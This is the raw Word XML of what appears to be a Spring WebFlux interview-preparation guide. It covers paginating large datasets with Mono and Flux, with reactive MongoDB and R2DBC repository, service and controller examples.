    <w:p w14:paraId="6F125E7E"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Flux&lt;T&gt; content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFF74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long totalElements;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DD056"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int totalPages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE248C"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int currentPage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCD644" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3474CC84"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Constructor, getters, and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6A74F"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68DD8D37"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the service layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F5937"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E4B7A"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domain.Page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F25F83"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2446F66A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51680178"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0D44F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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A9E0D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2E440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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF451DA"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4F076" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B9B7A9"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PagedResponse&lt;Item&gt;&gt; getItemsWithPagination(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC78B3D"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ageRequest pageRequest = PageRequest.of(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E356984"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Flux&lt;Item&gt; items = itemRepository.findAllBy(pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721DDC4B"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s.collectList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99264C"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map(list -&gt; new PagedResponse&lt;&gt;(Flux.fromIterable(list), list.size(), pageRequest.getPageSize(), page));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F37F4"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63F27FB4"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691A0417"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is response would return the data along with additional pagination details such as total elements and total pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BCF2F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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7. Handling Pagination for Large Datasets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7F5F9"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nsure you’re managing the backpressure properly, especially for larger datasets. You can use operators like skip() and take() to limit the number of records being fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D41844"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or example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3B522"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Flux&lt;Item&gt; getPaginatedItems(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438975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Repository.findAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11E094"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kip((long) page * size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE18C0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ake(size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C57821"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379E5B70"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is can work if you’re not using a database-specific pagination method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51269C2C" w14:textId="77777777" w:rsidR="00C201B0"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4CFBAD0">
          <v:rect id="_x0000_i2326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51421E92" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Summary of Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BB807"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PageRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use PageRequest.of(page, size) to create pagination requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFE173"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pository</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure your repository supports pagination by accepting PageRequest in methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA8CAD3"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ervice Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handle pagination logic in the service layer, converting parameters into a PageRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79D685"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ontroller Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accept page and size parameters in the REST API and pass them to the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40278C4D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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By following this approach, you can implement efficient and scalable pagination in a reactive Spring WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A82E1"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6E96F3E">
          <v:rect id="_x0000_i2327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B9FBF" w14:textId="5A7E7D8C"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25" w:name="_Toc196308005"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you paginate large datasets using Mono or Flux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p w14:paraId="6E1B3553" w14:textId="52D62BB8" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E"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o paginate large datasets using Mono or Flux in a </w:t>
      </w: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xml:space="preserve"> application, you will typically rely on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage asynchronous, non-blocking pagination. The general strategy is to fetch only a portion of the dataset based on the page number and size, and process it reactively using Mono or Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D9A85E"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Here’s how you can implement pagination for large datasets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CD153" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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Steps to Paginate Large Datasets Using Mono or Flux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65973950" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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 Use Reactive Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E9BEF"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For databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the repository method must return a Flux (for multiple items) or Mono (for single item) of data. We can use Pageable for MongoDB or PageRequest in general to handle pagination in the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153112EB"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 for MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF74DA"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64227A81"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mongodb.repository.ReactiveMongoRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C28041"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF0BD6" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3602DC"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interface ItemRepository extends ReactiveMongoRepository&lt;Item, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C187DE6"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Flux&lt;Item&gt; findAllBy(PageRequest pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2C171"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08E3BA36"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 for R2DBC (Reactive Relational DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B58E6"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repository.reactive.ReactiveCrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E3AA1"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C32D7"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1741B8" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3940DAA1"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interface ItemRepository extends ReactiveCrudRepository&lt;Item, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08102177"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Flux&lt;Item&gt; findAllBy(PageRequest pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE096F0"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5C0B64AE" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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2. Service Layer for Paginated Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C224BD7"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your service layer, you will use the PageRequest or Pageable object to fetch a specific subset of data. The idea is to pass the page number (page) and the size (size) and create the page request accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC44EC6"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or example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280EC957"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EC60D"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10CA73"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E335C91"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437308C2" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F23CB7A"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41C85D"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B03E5F" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0555B142"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DF66F"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5263E8C6" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE5D5B6"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Method for fetching paginated items using Mono or Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55448287"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Flux&lt;Item&gt; getItemsByPage(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405065F6"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ageRequest pageRequest = PageRequest.of(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67645DF0"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Repository.findAllBy(pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074BCA6"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6975D477"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6864C0DB" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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3. Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C477369"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the controller layer, you will pass the page and size from the request query parameters to the service method, and return the paginated data using Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C238BE3"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA7056"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D746A29"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36197558" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B791A1"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A8D1A"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E40074"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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F22C19" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C927945"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A434321"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11731498" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E9C943"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Endpoint to fetch paginated data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAD21A"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB0337"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Flux&lt;Item&gt; getItems(@RequestParam(defaultValue = "0") int page,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7731AA"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questParam(defaultValue = "10") int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B93B0C"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Service.getItemsByPage(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B119B"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787F1D67"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3F97FE2A"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ith this, a request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE73F0"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GET /api/items?page=0&amp;size=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2A07E"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will return the first page of items with a size of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3E79B" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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4. Handling Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998D316"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When dealing with large datasets, you must also consider </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which ensures the system doesn’t overwhelm the client or server by sending too much data at once. Spring WebFlux handles backpressure natively with Mono and Flux by applying the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6F286"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 WebFlux ensures that the client only receives the amount of data they can handle at any time, thus preventing memory overflows and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F2B801"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You can also use operators like skip() and take() for pagination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E89B01D"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Flux&lt;Item&gt; getPaginatedItems(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333639C1"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Repository.findAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42526646"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kip((long) page * size) // Skip items from previous pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A5801"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ake(size);              // Limit to the page size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F10A0"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4AADCA7A"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is way, even if you don't use database-native pagination features, you can still paginate large datasets using the Flux stream by managing the flow of data with skip() and take().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D89EF" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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5. Optimizing Large Dataset Fetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1409C"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For large datasets, it's crucial to avoid loading the entire dataset into memory at once. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagination</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the database query level, which returns only the required subset of records, and process them asynchronously with Mono and Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B786FA5" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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6. Example Using Mono for a Single Item with Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665FF803"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hen dealing with large datasets that need to return a single element in each request (e.g., an individual Mono response for each item in a paginated result), you can use Mono with pagination. This is less common for large sets but may be useful when handling large sets of single-element responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA7A96"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Mono&lt;Item&gt; getItemById(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD8AC2"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Repository.findById(id);  // Returns a Mono of Item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10C24"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3BFBAED9"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the context of pagination, this could work for scenarios where you need to fetch items one by one with Mono responses after applying pagination on each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416F98A4" w14:textId="77777777" w:rsidR="00550A8E"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EC81D5C">
          <v:rect id="_x0000_i2328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FB54D" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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omplete Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B3020"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Here’s a simple end-to-end example combining all the steps for paginating large datasets using Flux and Mono in a Spring WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12121DDC" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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Domain Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10396B"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annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577960F"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mongodb.core.mapping.Document;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4B5A3" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2078EF2E"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Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C7DB1"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EEE22A"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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B67508F"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String id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A35A0"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237ED06"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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CFE55" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A05E629"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Constructors, Getters, Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B8038"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5452CF91" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F1C4BF"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mongodb.repository.ReactiveMongoRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61158969"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12455990"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989A9AE" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013F2CD1"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interface ItemRepository extends ReactiveMongoRepository&lt;Item, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6EEAB"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Flux&lt;Item&gt; findAllBy(PageRequest pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EFE6B"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2A13549F" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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Service Layer:</w:t>
      </w:r>
    </w:p>
